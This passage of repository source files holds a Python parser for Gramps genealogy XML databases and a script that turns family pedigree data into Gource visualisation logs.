lat, lon for the location\n '''\n if self.lat and self.lon:\n return (self.lat, self.lon)\n return None\n\n def __str__(self):\n o = []\n o.append(\"Place\")\n title = \"\"\n if self.title:\n title = self.title\n lat_lon = \"\"\n if self.lat and self.lon:\n lat_lon = \" (lat={0}, lon={1})\".format(self.lat, self.lon)\n o.append(\"{0}{1}{2}\".format(indent, title, lat_lon))\n return \"\\n\".join(o)\n\n\nclass Event(object):\n '''\n A Gramps event object.\n\n Example of a Gramps event structure:\n\n <event handle=\"_bb2a73da89376f2e069\" change=\"1287656448\" id=\"E1000\">\n <type>Death</type>\n <dateval val=\"1955-06-04\"/>\n <place hlink=\"_bb2a73da908569b4132\"/>\n <noteref hlink=\"_bb2a73da9362223d031\"/>\n <sourceref hlink=\"_bb60df55dd862a3e6b1\" conf=\"4\">\n <spage>1955/012559</spage>\n <noteref hlink=\"_bb60eb134ff61992598\"/>\n <dateval val=\"1955-06-04\"/>\n </sourceref>\n </event>\n\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.type = None\n self.description = None\n self.date = None\n self.date_type = None\n self.date_cformat = None\n\n # handles\n self.place_handle = None\n self.note_handles = []\n self.source_handles = []\n\n @property\n def datetime(self):\n '''\n Return a datetime object for this event date\n '''\n if self.date:\n try:\n return date_processor.parse(\n self.date, cal_format=self.date_cformat)\n except Exception:\n logger.exception(\n \"Problem parsing date: {0}, cal_format={1}\".format(\n self.date, self.cformat))\n raise\n else:\n return None\n\n def datetime_as_string(self):\n return generate_timestring(self.datetime)\n\n @property\n def place(self):\n if self.place_handle:\n return self.store.get_place(self.place_handle)\n return None\n\n def __str__(self):\n o = []\n o.append(\"Event\")\n\n dateStr = \"unknown\"\n if self.date:\n if self.date_type:\n dateStr = \"{0} {1}\".format(self.date_type, self.date)\n else:\n dateStr = self.date\n\n o.append(\"{0}{1}, {2}\".format(indent, self.type, dateStr))\n\n placeStr = \"unknown\"\n if self.place:\n thePlace = self.store.get_place(self.place)\n if thePlace:\n p = []\n for line in str(thePlace).split(\"\\n\"):\n p.append(\"{0}{1}\".format(indent, line))\n placeStr = \"\\n\".join(p)\n o.append(placeStr)\n else:\n o.append(\"{0}Place\".format(indent * 2))\n o.append(\"{0}None\".format(indent * 3))\n\n if self.description:\n o.append(\"{0}description={1}\".format(indent, self.description))\n\n return \"\\n\".join(o)\n\n\nclass Person(object):\n '''\n A person object\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.gender = None\n self.firstnames = []\n self.prefix = None\n self.surname = None\n self._birth = None\n self._death = None\n\n # handles\n self.event_handles = []\n self.child_of_handle = None\n self.parent_in_handles = []\n self.notes = []\n self._events = None\n\n @property\n def name(self):\n '''\n Return a string containing the full name of this person\n i.e. firstname middlenames surname\n '''\n if len(self.firstnames) > 1:\n firstnames = \" \".join(self.firstnames)\n else:\n firstnames = \"\".join(self.firstnames)\n return \"{0} {1}\".format(firstnames, self.surname)\n\n @property\n def name_with_dates(self):\n '''\n Return a string containing this persons name and their\n birth and death dates.\n i.e firstname surname (b. date, d. date)\n '''\n if self.death is None:\n return \"{0} (b. {1})\".format(self.name, self.birth)\n else:\n return \"{0} (b. {1}, d. {2})\".format(self.name,\n self.birth,\n self.death)\n\n @property\n def birth(self):\n '''\n Return a birth date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n if self._birth is None:\n # search through events\n for event in self.events:\n if event.type == 'Birth':\n if event.date:\n if event.date_type:\n self._birth = \"{0} {1}\".format(event.date_type,\n event.date)\n else:\n self._birth = event.date\n else:\n self._birth = \"unknown\"\n\n return self._birth\n\n @property\n def birth_datetime(self):\n '''\n Return a birth date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n # search through events\n for event in self.events:\n if event.type == 'Birth':\n return event.datetime\n return None\n\n @property\n def death(self):\n '''\n Return a death date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n if self._death is None:\n # search through events\n for event in self.events:\n if event.type == 'Death':\n if event.date:\n if event.date_type:\n self._death = \"{0} {1}\".format(event.date_type,\n event.date)\n else:\n self._death = event.date\n else:\n self._death = \"unknown\"\n\n return self._death\n\n @property\n def death_datetime(self):\n '''\n Return a death date string for this person (if available).\n Include any prefixes such as bef, aft, abt, etc.\n '''\n # search through events\n for event in self.events:\n if event.type == 'Death':\n return event.datetime\n return None\n\n @property\n def events(self):\n if self._events is None:\n self._events = []\n if self.event_handles:\n for event_handle in self.event_handles:\n event = self.store.get_event(event_handle)\n self._events.append(event)\n return self._events\n\n def associated_events(self, includeEventsWithNoDate=False):\n '''\n Return a time ordered list of tuples for each event that this person\n was involved with. This set includes direct event involvement\n (eg. birth) and indirect involvement (eg. birth of younger sibling).\n\n Each item in the list is a tuple containing a Person or Family object\n and an Event object.\n '''\n\n dated_events = []\n undated_events = []\n\n SiblingCutoffDatetime = None\n directPersonEvent = True\n\n for event in self.events:\n if event.datetime:\n if event.type in ['Immigration', 'Emmigration']:\n # This flag is used later to ensure we don't associate\n # siblings with this person's events after an immigration\n # event as it is assumed that the person would not be\n # involved/around these events.\n SiblingCutoffDatetime = event.datetime\n dated_events.append((self, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append((self, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding direct person event {0} for {1} as it \"\n \"has no date\".format(event.type, self.name))\n pass\n\n # now retrieve associated events that this person was involved with\n directPersonEvent = False\n\n if self.parent_in_handles:\n logger.debug(\n \"{0} is a parent in {1} families\".format(\n self.name, len(self.parent_in_handles)))\n for parent_handle in self.parent_in_handles:\n family = self.store.get_family(parent_handle)\n # Add any family events such as marriage, divorce\n logger.debug(\n \"Family {0} has {1} family events\".format(\n family.name, len(family.events)))\n for event in family.events:\n if event.datetime:\n dated_events.append(\n (family, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append(\n (family, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding associated family event {0} for \"\n \"{1} as it has no date\".format(\n event.type, family.name))\n pass\n\n logger.debug(\n \"Family {0} has {1} children\".format(\n family.name, len(family.children)))\n # add birth of children\n if family.children:\n for child in family.children:\n for event in child.events:\n if event.type == 'Birth':\n if event.datetime:\n dated_events.append(\n (child, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append(\n (child, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding associated family \"\n \"event {0} for {1} as it has no \"\n \"date\".format(\n event.type, child.name))\n pass\n\n if self.child_of_handle:\n # potentially associate younger sibling location events too\n # as this person was likely around those locations too.\n family = self.store.get_family(self.child_of_handle)\n logger.debug(\n \"Family {0} had {1} children\".format(\n family.name, len(family.children)))\n for sibling in family.children:\n if sibling.handle != self.handle:\n for event in sibling.events:\n if event.type == 'Birth':\n if event.datetime:\n if event.datetime > self.birth_datetime:\n # don't associate sibling birth events if they\n # occur after the person has immigrated/emmigrated.\n if SiblingCutoffDatetime is None:\n dated_events.append(\n (sibling, event, directPersonEvent))\n else:\n if event.datetime < SiblingCutoffDatetime:\n dated_events.append(\n (sibling, event, directPersonEvent))\n else:\n if includeEventsWithNoDate:\n undated_events.append(\n (sibling, event, directPersonEvent))\n else:\n logger.debug(\n \"Discarding associated family event \"\n \"{0} for {1} as it has no date\" % (\n event.type, sibling.name))\n pass\n\n # sort events in time order. This can only be done after\n # making sure that we only have events with dates.\n def get_datetime(dated_event_tuple):\n person_or_family_object, event, directEvent = dated_event_tuple\n return event.datetime\n\n dated_events.sort(key=get_datetime)\n\n events = dated_events\n\n # tack undated events onto end of time ordered list if requested\n if includeEventsWithNoDate:\n events.extend(undated_events)\n\n return events\n\n def ancestors(self, ancestors=None):\n \"\"\"\n Return an unordered list of this person's handle and those of their\n ancestors.\n \"\"\"\n logger.debug(\"Collecting ancestors for {0}\".format(self.name))\n if ancestors is None:\n ancestors = []\n ancestors.append(self.handle)\n\n if self.child_of_handle:\n family = self.store.get_family(self.child_of_handle)\n\n # walk up the father's tree\n if family.father:\n family.father.ancestors(ancestors)\n\n # walk up the mother's tree\n if family.mother:\n family.mother.ancestors(ancestors)\n\n return ancestors\n\n def descendents(self):\n '''\n Return an unordered list of this person's handle and those of their\n descendents.\n '''\n raise NotImplementedError\n\n def __str__(self):\n o = []\n o.append(\"Person\")\n o.append(\"{0}{1}\".format(indent, self.name_with_dates))\n\n if self.child_of_handle:\n theFamily = self.store.get_family(self.child_of_handle)\n o.append(\"{0}Child of {1}\".format(indent, theFamily.name))\n else:\n o.append(\"{0}Child of unknown\".format(indent))\n\n if self.parent_in_handles:\n for p in self.parent_in_handles:\n theFamily = self.store.get_family(p)\n o.append(\"{0}Parent in {1}\".format(indent, theFamily.name))\n if self.events:\n o.append(\"{0}Events:\".format(indent))\n indent2 = indent * 2\n lines = []\n for event in self.events:\n for line in str(event).split(\"\\n\"):\n lines.append(\"{0}{1}\".format(indent2, line))\n eventStr = \"\\n\".join(lines)\n o.append(eventStr)\n\n return \"\\n\".join(o)\n\n\nclass Family(object):\n '''\n A Gramps family object\n\n Example of a Gramps family structure:\n\n <family handle=\"_bbd9a6fc3005c442174\" change=\"1296473477\" id=\"F0414\">\n <rel type=\"Unknown\"/>\n <father hlink=\"_bbd9a89f2d86cb5d966\"/>\n <mother hlink=\"_bbd9aa0bf5828e2063d\"/>\n <eventref hlink=\"_bbd9aac4f234de2e484\" role=\"Family\"/>\n <childref hlink=\"_bbd99985f4654c844c2\"/>\n <childref hlink=\"_bbd9b4d182d06ba9642\"/>\n <childref hlink=\"_bbd9b59cb0709454032\"/>\n <childref hlink=\"_bbd9b32db1501cb7968\"/>\n <childref hlink=\"_bbd9fd3f1404b1ac595\"/>\n </family>\n\n '''\n\n def __init__(self, store):\n self.store = store\n self.handle = None\n self.id = None\n self.father_handle = None\n self.mother_handle = None\n self.relationship = None\n\n self.event_handles = []\n self.children_handles = []\n self.step_children_handles = []\n self.source_handles = []\n self._mother = None\n self._father = None\n self._children = None\n self._events = None\n\n @property\n def name(self):\n '''\n Return a string containing the father and mother name for this family\n '''\n if self.mother:\n m = self.mother.name\n else:\n m = \"unknown\"\n\n if self.father:\n f = self.father.name\n else:\n f = \"unknown\"\n\n family_name = \"{0} & {1}\".format(f, m)\n return family_name\n\n @property\n def name_with_dates(self):\n '''\n Return a string containing the father and mother name of this family\n which include the birth and death dates.\n '''\n if self.mother:\n m = self.mother.name_with_dates\n else:\n m = \"unknown\"\n\n if self.father:\n f = self.father.name_with_dates\n else:\n f = \"unknown\"\n\n family_name = \"{0} & {1}\".format(f, m)\n return family_name\n\n @property\n def mother(self):\n if self._mother is None:\n # search for mother person\n if self.mother_handle:\n self._mother = self.store.get_person(self.mother_handle)\n return self._mother\n\n @property\n def father(self):\n if self._father is None:\n # search for father person\n if self.father_handle:\n self._father = self.store.get_person(self.father_handle)\n return self._father\n\n @property\n def children(self):\n if self._children is None:\n self._children = []\n if self.children_handles:\n # search for children persons\n for child_handle in self.children_handles:\n child = self.store.get_person(child_handle)\n if child:\n self._children.append(child)\n return self._children\n\n @property\n def events(self):\n if self._events is None:\n self._events = []\n if self.event_handles:\n for event_handle in self.event_handles:\n event = self.store.get_event(event_handle)\n self._events.append(event)\n return self._events\n\n def __str__(self):\n o = []\n o.append(\"Family\")\n o.append(\"{0}{1}\".format(indent, self.name_with_dates))\n o.append(\"{0}relationship={1}\".format(indent, self.relationship))\n\n # TODO: display eventref here\n\n if self.children:\n o.append(\"{0}Children:\".format(indent))\n indent2 = indent * 2\n for child in self.children:\n indented_child_lines = []\n for line in str(child).split(\"\\n\"):\n indented_child_lines.append(\"{0}{1}\".format(indent2, line))\n childStr = \"\\n\".join(indented_child_lines)\n o.append(childStr)\n else:\n o.append(\"{0}Children: None\".format(indent))\n\n return \"\\n\".join(o)\n\n\nclass Store(object):\n '''\n Stores information extracted by the Gramps database parser\n '''\n\n def __init__(self):\n self.persons = {}\n self.families = {}\n self.events = {}\n self.places = {}\n self.notes = {}\n self.sources = {}\n\n def get_person(self, handle):\n '''\n Return the person with the specified handle\n '''\n return self.persons.get(handle, None)\n\n def get_family(self, handle):\n '''\n Return the family with the specified handle\n '''\n return self.families.get(handle, None)\n\n def get_event(self, handle):\n '''\n Return the event with the specified handle\n '''\n return self.events.get(handle, None)\n\n def get_place(self, handle):\n '''\n Return the place with the specified handle\n '''\n return self.places.get(handle, None)\n\n def get_source(self, handle):\n '''\n Return the source with the specified handle\n '''\n return self.sources.get(handle, None)\n\n def get_note(self, handle):\n '''\n Return the note with the specified handle\n '''\n return self.notes.get(handle, None)\n\n def find_person(self, search_name):\n '''\n Return the handle for the first person found with a\n matching name.\n Return None if no match is found.\n '''\n logger.debug(\"Searching for {0}\".format(search_name))\n search_person_handle = None\n for person_handle in self.persons:\n person = self.get_person(person_handle)\n if person.name == search_name:\n search_person_handle = person.handle\n logger.debug(\"Found {0} with handle {1}\".format(search_name,\n person.handle))\n break\n return search_person_handle\n\n\nclass NS:\n '''\n Namespace helper to append the gramps namespace onto tags.\n This makes writing the search paths easier.\n '''\n def __init__(self, uri):\n self.uri = uri\n\n def __getattr__(self, tag):\n return self.uri + tag\n\n def __call__(self, path):\n prefix = None\n if path.startswith(\".//\"):\n items = path[3:].split(\"/\")\n prefix = './/'\n else:\n items = path.split(\"/\")\n\n ns_tags = []\n for tag in items:\n ns_tag = getattr(self, tag)\n ns_tags.append(ns_tag)\n ns_path = \"/\".join(ns_tags)\n\n if prefix:\n ns_path = './/' + ns_path\n\n return ns_path\n\n\ndef to_pretty_xml(elem):\n \"\"\"\n Return a pretty-printed XML string for the Element.\n \"\"\"\n from xml.dom import minidom\n rough_string = etree.tostring(elem, 'utf-8')\n reparsed = minidom.parseString(rough_string)\n return reparsed.toprettyxml(indent=\" \")\n\n\nclass Parser(object):\n\n def parse(self, gramps_file):\n \"\"\"\n @return: a store object populated with content extracted from the database.\n \"\"\"\n\n logger.info(\"Loading Gramps database from {0}\".format(gramps_file))\n\n store = Store()\n\n with gzip.GzipFile(filename=gramps_file, mode=\"rb\", compresslevel=9) as fd:\n data = fd.read()\n\n root = etree.fromstring(data)\n\n # Detect the namespace so we know what to place in front\n # of the known tag names.\n detected_namespace = \"\"\n items = root.tag.split(\"}\")\n if len(items) == 2:\n namespace_candidate, tag = items\n if \"{\" in namespace_candidate:\n # There is a namespace prefix\n detected_namespace = '{%s}' % namespace_candidate[1:]\n\n GrampsNS = NS(detected_namespace)\n\n # Extract person entries into Person objects and store them\n # in the persons dict keyed by the person's handle.\n #\n personNodes = root.findall(GrampsNS('.//people/person'))\n\n for personNode in personNodes:\n p = Person(store)\n p.id = personNode.attrib.get('id')\n\n genderNode = personNode.find(GrampsNS('gender'))\n p.gender = genderNode.text\n\n handle = personNode.attrib.get('handle')\n p.handle = handle\n store.persons[handle] = p\n\n nameNode = personNode.find(GrampsNS('name'))\n if nameNode:\n\n firstnameNode = nameNode.find(GrampsNS('first'))\n if firstnameNode is not None:\n p.firstnames = firstnameNode.text.split(\" \")\n else:\n pass # No first name node found\n\n surnameNode = nameNode.find(GrampsNS('surname'))\n if surnameNode is not None:\n p.surname = surnameNode.text\n p.prefix = surnameNode.attrib.get('prefix')\n else:\n pass # No surname node found\n else:\n pass # No name node found\n\n for eventNode in personNode.findall(GrampsNS('eventref')):\n event_handle = eventNode.attrib.get('hlink')\n p.event_handles.append(event_handle)\n\n for parentinNode in personNode.findall(GrampsNS('parentin')):\n parentin_handle = parentinNode.attrib.get('hlink')\n p.parent_in_handles.append(parentin_handle)\n\n childofNode = personNode.find(GrampsNS('childof'))\n if childofNode is not None:\n p.child_of_handle = childofNode.attrib.get('hlink')\n\n for noteNode in personNode.findall(GrampsNS('noteref')):\n note_handle = noteNode.attrib.get('hlink')\n p.notes.append(note_handle)\n\n familyNodes = root.findall(GrampsNS('.//families/family'))\n\n for familyNode in familyNodes:\n f = Family(store)\n f.id = familyNode.attrib.get('id')\n\n motherNode = familyNode.find(GrampsNS('mother'))\n if motherNode is not None:\n f.mother_handle = motherNode.attrib.get('hlink')\n\n fatherNode = familyNode.find(GrampsNS('father'))\n if fatherNode is not None:\n f.father_handle = fatherNode.attrib.get('hlink')\n\n relationshipNode = familyNode.find(GrampsNS('rel'))\n if relationshipNode is not None:\n f.relationship = relationshipNode.attrib.get('type')\n\n for eventNode in familyNode.findall(GrampsNS('eventref')):\n f.event_handles.append(eventNode.attrib.get('hlink'))\n\n handle = familyNode.attrib.get('handle')\n f.handle = handle\n store.families[handle] = f\n\n for childNode in familyNode.findall(GrampsNS('childref')):\n child_handle = childNode.attrib.get('hlink')\n if childNode.attrib.get('frel') == 'Stepchild':\n f.step_children_handles.append(child_handle)\n else:\n f.children_handles.append(child_handle)\n\n for sourceNode in familyNode.findall(GrampsNS('sourceref')):\n source_handle = sourceNode.attrib.get('hlink')\n f.source_handles.append(source_handle)\n\n eventNodes = root.findall(GrampsNS('.//events/event'))\n\n for eventNode in eventNodes:\n e = Event(store)\n e.id = personNode.attrib.get('id')\n\n handle = eventNode.attrib.get('handle')\n e.handle = handle\n store.events[handle] = e\n\n typeNode = eventNode.find(GrampsNS('type'))\n if typeNode is not None:\n e.type = typeNode.text\n\n datevalNode = eventNode.find(GrampsNS('dateval'))\n if datevalNode is not None:\n e.date = datevalNode.attrib.get('val')\n e.date_type = datevalNode.attrib.get('type')\n e.cformat = datevalNode.attrib.get('cformat')\n\n descriptionNode = eventNode.find(GrampsNS('description'))\n if descriptionNode is not None:\n e.description = descriptionNode.text\n\n placeNode = eventNode.find(GrampsNS('place'))\n if placeNode is not None:\n e.place_handle = placeNode.attrib.get('hlink')\n\n for noteNode in eventNode.findall(GrampsNS('noteref')):\n note_handle = noteNode.attrib.get('hlink')\n e.note_handles.append(note_handle)\n\n for sourceNode in eventNode.findall(GrampsNS('sourceref')):\n source_handle = sourceNode.attrib.get('hlink')\n e.source_handles.append(source_handle)\n\n placeNodes = root.findall(GrampsNS('.//places/placeobj'))\n\n for placeNode in placeNodes:\n p = Place(store)\n p.id = placeNode.attrib.get('id')\n\n handle = placeNode.attrib.get('handle')\n p.handle = handle\n store.places[handle] = p\n\n titleNode = placeNode.find(GrampsNS('ptitle'))\n if titleNode is not None:\n p.title = titleNode.text\n\n coordNode = placeNode.find(GrampsNS('coord'))\n if coordNode is not None:\n p.lat = coordNode.attrib.get('lat')\n p.lon = coordNode.attrib.get('long')\n\n # TODO:\n # extract sources\n # extract notes\n # etc\n\n return store\n\nparser = Parser()\n" }, { "alpha_fraction": 0.52869713306427, "alphanum_fraction": 0.5352604389190674, "avg_line_length": 38.45454406738281, "blob_id": "2227c1eca1b4d67d19a4becf669a9fc348eccd57", "content_id": "f0d4aa68cc66626f277c712290884d18a7bbeca2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14322, "license_type": "permissive", "max_line_length": 116, "num_lines": 363, "path": "/gramps2gource.py", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\nThis script produces a custom Gource log file that can be passed to Gource for\nit to display family history information. Currently it supports ancestors only.\n\nChoose a focus person and pass this person's name along with the Gramps .gramps\nfile path to the script via command line arguments.\n\n$ python gramps2gource.py --name=\"Focus Person\" --db=path/to/filename.gramps\n\nThen display the custom log using gource:\n\n $ cat /path/to/pedigree_<name>.log | gource -1280x720 --log-format custom\n --font-size 20 --hide users,dirnames,date --stop-at-end\n --camera-mode overview --seconds-per-day 1 --disable-bloom\n --auto-skip-seconds 1 -i 0 -c 3.0 -\n\nThe visualisation can be recorded to file using:\n\n $ cat /path/to/pedigree_<name>.log | gource -1280x720 --log-format custom\n --font-size 20 --hide users,dirnames,date --stop-at-end\n --camera-mode overview --seconds-per-day 1 --disable-bloom\n --auto-skip-seconds 1 -i 0 -c 3.0 -output-ppm-stream -\n --output-framerate 60 - | avconv -y -r 60 -f image2pipe -vcodec ppm -i -\n -b 8192K /path/to/pedigree_<name>.mp4\n\nAuthor: Chris Laws\n'''\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom future.builtins import open\nfrom future.builtins import int\n\nimport datetime\nimport logging\nimport sys\nimport time\n\nimport gramps\n\n\nlogger = logging.getLogger(__name__)\n\n\nref_dt = datetime.datetime(1970, 1, 1, 0, 0, 0)\nref_timestamp = time.mktime(ref_dt.timetuple())\ntry:\n secondsInOneDay = datetime.timedelta(days=1).total_seconds()\nexcept AttributeError as ex:\n # python2.6 does not have total_seconds\n one_day_dt = datetime.timedelta(days=1)\n secondsInOneDay = (one_day_dt.microseconds + (one_day_dt.seconds + one_day_dt.days * 24 * 3600) * 10**6) / 10**6\n\n\nGOURCE_ADDED = 'A' # maps to birth\nGOURCE_DELETED = 'D' # maps to death\nGOURCE_MODIFIED = 'M' # maps to change\nGOURCE_UNKNOWN = '?' # maps to nothing\n\n\nclass Gramps2Gource(object):\n '''\n Create Gource custom logs from Gramps data files.\n '''\n\n def __init__(self, gramps_file):\n self.db = gramps.parser.parse(gramps_file)\n\n def get_ancestors(self, person, ancestors=None, gource_prefix=None):\n \"\"\"\n Return an unordered list of tuples for this person and their\n ancestors. Each tuple contains a person handle and a pseudo-path\n to be used by Gource.\n \"\"\"\n logger.debug(\"Collecting ancestors for {0}\".format(person.name))\n\n if ancestors is None:\n ancestors = []\n\n # Construct a pseudo path from the person's unique handle.\n if gource_prefix:\n gource_prefix = \"{0}/{1}\".format(gource_prefix, person.handle)\n else:\n gource_prefix = person.handle\n\n person_name = person.name_with_dates\n gource_path = \"{0}/{1}\".format(gource_prefix, person_name)\n ancestors.append((person.handle, gource_path))\n\n if person.child_of_handle:\n family = self.db.get_family(person.child_of_handle)\n\n # walk up the father's tree\n if family.father:\n self.get_ancestors(family.father,\n ancestors=ancestors,\n gource_prefix=gource_prefix)\n\n # walk up the mother's tree\n if family.mother:\n self.get_ancestors(family.mother,\n ancestors=ancestors,\n gource_prefix=gource_prefix)\n\n return ancestors\n\n def pedigree(self, names, output_file):\n \"\"\"\n Creates a custom Gource log containing the pedigree information for\n the specified names.\n \"\"\"\n\n if not names:\n logger.error(\"No focus persons supplied\")\n sys.exit(1)\n\n all_records = []\n\n for name in names:\n person_handles = []\n logger.info(\"Generating pedigree output for: {0}\".format(name))\n person_handle = self.db.find_person(name)\n if person_handle:\n person = self.db.get_person(person_handle)\n ancestor_handles = self.get_ancestors(person)\n\n logger.debug(\"{0} has {1} ancestors in the database\".format(\n name, len(ancestor_handles)))\n person_handles = ancestor_handles\n\n if person_handles:\n people_to_plot = []\n for person_handle, person_gource_path in person_handles:\n person = self.db.get_person(person_handle)\n try:\n associated_events = person.associated_events()\n except TypeError:\n associated_events = []\n\n # Filter associated events to only include those with\n # dates. Only dated events are useful when outputing\n # a Gource formatted log.\n associated_events_with_dates = []\n for associated_event in associated_events:\n obj, event, directEvent = associated_event\n if event.date:\n associated_events_with_dates.append(\n associated_event)\n\n if associated_events_with_dates:\n people_to_plot.append(\n (person, person_gource_path,\n associated_events_with_dates))\n\n if people_to_plot:\n logger.info(\n \"Starting generation of custom gource log data\")\n\n records = self._to_pedigree_gource_log_format(\n people_to_plot)\n all_records.extend(records)\n\n logger.info(\n \"Finished generation of custom gource log data\")\n\n if all_records:\n # Sort events by time such that Gource displays the pedigree in reverse order\n logger.info(\n \"Adjusting timestamps so gource displays them in reverse order\")\n records = [(ts * -1, name, event, path) for ts, name, event, path in all_records]\n records.sort()\n\n logger.info(\"Writing custom gource log data to {0}\".format(output_file))\n\n with open(output_file, 'w') as fd:\n for ts, name, event, path in records:\n fd.write(\"{0}|{1}|{2}|{3}\\n\".format(ts, name, event, path))\n fd.write(\"\\n\") # add an empty line at the end to trigger EOF\n\n logger.info(\n \"Completed. Custom gource log file: {0}\".format(\n output_file))\n else:\n logger.error(\n \"No gource log file created - no records to write\")\n\n def _to_gource_log_format(self, person_events):\n \"\"\"\n Return a list of custom gource formatted log entries based on the list\n of person events passed in.\n \"\"\"\n\n records = []\n\n for person, person_gource_path, related_events in person_events:\n\n logger.debug(\"Creating log entries for {0}\".format(person.name))\n\n # Reduce events to only those that contain dates\n related_events_with_dates = []\n for related_event in related_events:\n person_family_object, event, directEvent = related_event\n if event.date:\n related_events_with_dates.append(related_event)\n else:\n logger.debug(\"No date for event {0}\".format(event.type))\n\n if related_events_with_dates:\n\n for obj, event, directEvent in related_events_with_dates:\n\n if event.datetime.year < ref_dt.year:\n # Year is less than the epoch meaning we can't use\n # time.mktime to create a useful timestamp for us.\n # Instead, subtract the necessary seconds from the\n # epoch time to arrive at the event time.\n ref_delta = ref_dt - event.datetime\n delta_seconds = ref_delta.total_seconds()\n timestamp = ref_timestamp - delta_seconds\n else:\n timestamp = time.mktime(event.datetime.timetuple())\n\n # Gource requires timestamp as an int\n timestamp = int(timestamp)\n\n if event.type == 'Birth':\n if directEvent:\n gource_event = GOURCE_ADDED\n else:\n gource_event = GOURCE_MODIFIED\n elif event.type in ['Baptism', 'Christening']:\n gource_event = GOURCE_MODIFIED\n elif event.type == 'Death':\n gource_event = GOURCE_DELETED\n elif event.type in ['Burial', 'Cremation']:\n gource_event = GOURCE_MODIFIED\n elif event.type in ['Marriage', 'Marriage Banns']:\n gource_event = GOURCE_MODIFIED\n elif event.type == 'Census':\n gource_event = GOURCE_MODIFIED\n elif event.type in [\"Divorce\", 'Divorce Filing']:\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Electoral Roll\":\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Emigration\":\n gource_event = GOURCE_MODIFIED\n elif event.type in [\"Residence\", \"Property\"]:\n gource_event = GOURCE_MODIFIED\n elif event.type in [\"Immigration\", \"Emmigration\"]:\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Occupation\":\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Probate\":\n gource_event = GOURCE_MODIFIED\n else:\n gource_event = GOURCE_UNKNOWN\n logger.debug(\"Don't know how to handle event type {0}\".format(event.type))\n\n if gource_event != GOURCE_UNKNOWN:\n record = (timestamp, person.surname.lower(),\n gource_event, person_gource_path)\n records.append(record)\n\n records.sort()\n return records\n\n def _to_pedigree_gource_log_format(self, person_events):\n \"\"\"\n Return a list of pedigree specific custom gource formatted log entries\n based on the list of person events passed in.\n \"\"\"\n\n records = []\n\n for person, gource_path, related_events in person_events:\n\n logger.debug(\"Creating log entries for {0}\".format(person.name))\n\n # Reduce events to only those that contain dates\n related_events_with_dates = []\n for related_event in related_events:\n person_family_object, event, directEvent = related_event\n if event.date:\n related_events_with_dates.append(related_event)\n else:\n logger.debug(\"No date for event {0}\".format(event.type))\n\n if related_events_with_dates:\n\n for obj, event, directEvent in related_events_with_dates:\n\n if event.datetime.year < ref_dt.year:\n # Year is less than the epoch meaning we can't use\n # time.mktime to create a useful timestamp for us.\n # Instead, subtract the necessary seconds from the\n # epoch time to arrive at the event time.\n ref_delta = ref_dt - event.datetime\n delta_seconds = ref_delta.total_seconds()\n timestamp = ref_timestamp - delta_seconds\n else:\n timestamp = time.mktime(event.datetime.timetuple())\n\n # Gource requires timestamp as an int\n timestamp = int(timestamp)\n\n # For this particular application we only want to capture\n # the birth (ADDED) event.\n\n if event.type == 'Birth':\n if directEvent:\n gource_event = GOURCE_ADDED\n record = (timestamp, person.surname.lower(),\n gource_event, gource_path)\n records.append(record)\n\n records.sort()\n return records\n\n\nif __name__ == \"__main__\":\n\n import argparse\n\n parser = argparse.ArgumentParser(\n description=\"Create Gource custom logs from Gramps data\")\n parser.add_argument(\"-d\", \"--db\", dest=\"database\", default=None,\n type=str,\n help=\"The gramps database file to use\")\n parser.add_argument(\"-n\", \"--names\", action='append', dest=\"names\",\n default=None, type=str,\n help=\"The focus person to extract pedigree data for\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output\", default=None,\n type=str,\n help=\"The name of the file to send the output to\")\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO, format='%(levelname)s - %(message)s')\n\n if args.database is None:\n print(\"Error: No gramps file provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.names is None:\n print(\"Error: No focus name(s) provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.output is None:\n if len(args.names) > 1:\n args.output = \"pedigree.log\"\n else:\n lower_name = args.names[0].lower().replace(\" \", \"_\")\n args.output = \"pedigree_{0}.log\".format(lower_name)\n\n g2g = Gramps2Gource(args.database)\n g2g.pedigree(args.names, args.output)\n\n logger.info(\"Done.\")\n" }, { "alpha_fraction": 0.6057640314102173, "alphanum_fraction": 0.6112017631530762, "avg_line_length": 27.71875, "blob_id": "6834825d06576e5ca7cda24fe3c81dd0c8654154", "content_id": "e69c74d0288e1364573525185e811f02d33c54f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "permissive", "max_line_length": 77, "num_lines": 64, "path": "/custom_date_g2g.py", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "\nimport argparse\nimport logging\nimport sys\n\nimport gramps\nfrom gramps2gource import Gramps2Gource\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef my_date_handler(datestring):\n ''' Implement your custom date parser here.\n\n :param datestring: a date string containg a date in a particular calendar\n format.\n\n :return: a datetime object representing the date.\n '''\n raise NotImplementedError\n\n\nparser = argparse.ArgumentParser(\n description=\"Create Gource custom logs from Gramps data\")\nparser.add_argument(\"-d\", \"--db\", dest=\"database\", default=None,\n type=str,\n help=\"The gramps database file to use\")\nparser.add_argument(\"-n\", \"--names\", action='append', dest=\"names\",\n default=None, type=str,\n help=\"The focus person to extract pedigree data for\")\nparser.add_argument(\"-o\", \"--output\", dest=\"output\", 